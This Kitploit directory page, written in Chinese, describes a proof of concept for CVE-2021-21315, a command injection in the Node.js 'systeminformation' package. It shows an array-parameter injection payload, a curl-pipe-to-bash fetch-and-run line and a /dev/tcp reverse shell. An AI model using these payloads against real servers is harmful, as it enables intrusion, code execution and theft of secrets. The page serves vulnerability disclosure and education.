Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-21315-PoC — CVE 2021-21315 PoC | Kitploit
工具/GitHubGitHub/forbiddenprogrammer/cve-2021-21315-poc
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubforbiddenprogrammer/cve-2021-21315-poc

CVE-2021-21315-PoC

CVE 2021-21315 PoC

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
1602525年前Kitploit 审核通过
分享

CVE-2021-21315-systeminformation

这是针对 CVE-2021-21315 的概念验证,该漏洞影响 Node.JS 的系统信息库(npm 包 "systeminformation")。npmjs.com/systeminformation

"务必检查或清理传递给 si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad() 等服务参数……仅允许字符串,拒绝任何数组。字符串清理如预期正常工作。"

由于该漏洞说明不够清晰(依我之见),我决定基于有漏洞版本的 systeminformation 编写一个小应用。 PoC 包含:

  1. 一个用 Node.js 编写的测试应用,使用 express 和有漏洞的 systeminformation
  2. 一个简单的测试载荷,用于在受影响机器上创建 .txt 文件

复现步骤:

  1. 在 Linux 服务器环境中运行应用
  2. 向 site.com/api/getServices?name=nginx 发起 GET 请求(nginx 仅为示例) obraz
  3. 现在尝试发送如下请求:yoursite.com/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt) obraz

这将会失败,因为字符串清理: obraz

正如 CVE 详情所述:"清理如预期正常工作,拒绝任何数组 [...]"

  1. 现在尝试发送请求:yoursite.com/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt) obraz 这次,如果你查看 "name" 的值,它没有被清理——成功!看看命令是否被执行了

obraz

成功!我们的命令被执行了。 当然没人会在意 "pwn.txt",但潜在的攻击者可以:

  1. 上传内部文件,例如 index.js(我们应用的核心,包含潜在的 API 密钥、数据库连接字符串等)或其他文件
  2. 下载并执行脚本——curl -s http://server/path/script.sh | bash /dev/stdin arg1 arg2
  3. 反弹 shell——bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
  4. 杀死进程(也可以杀死我们的测试 node 应用)
  5. 甚至更邪恶的事情……

"命令注入"听起来无伤大雅,但在某些条件下可能会造成巨大影响

该问题在 "systeminformation" 的 5.3.1 版本中已修复 致谢 https://www.huntr.dev/users/EffectRenan (他发现了该漏洞,但依我之见,他的 "PoC" 并未展示实际世界的影响)

此外,欢迎在 CTF 中使用此 PoC,但如果能注明漏洞发现者 EffectRean 和 PoC 创建者(我),那就太好了,干杯!

免责声明

本项目仅可用于教育目的。未经授权对目标系统使用本软件是违法的,因滥用本软件造成的任何损失,作者概不负责。

下载工具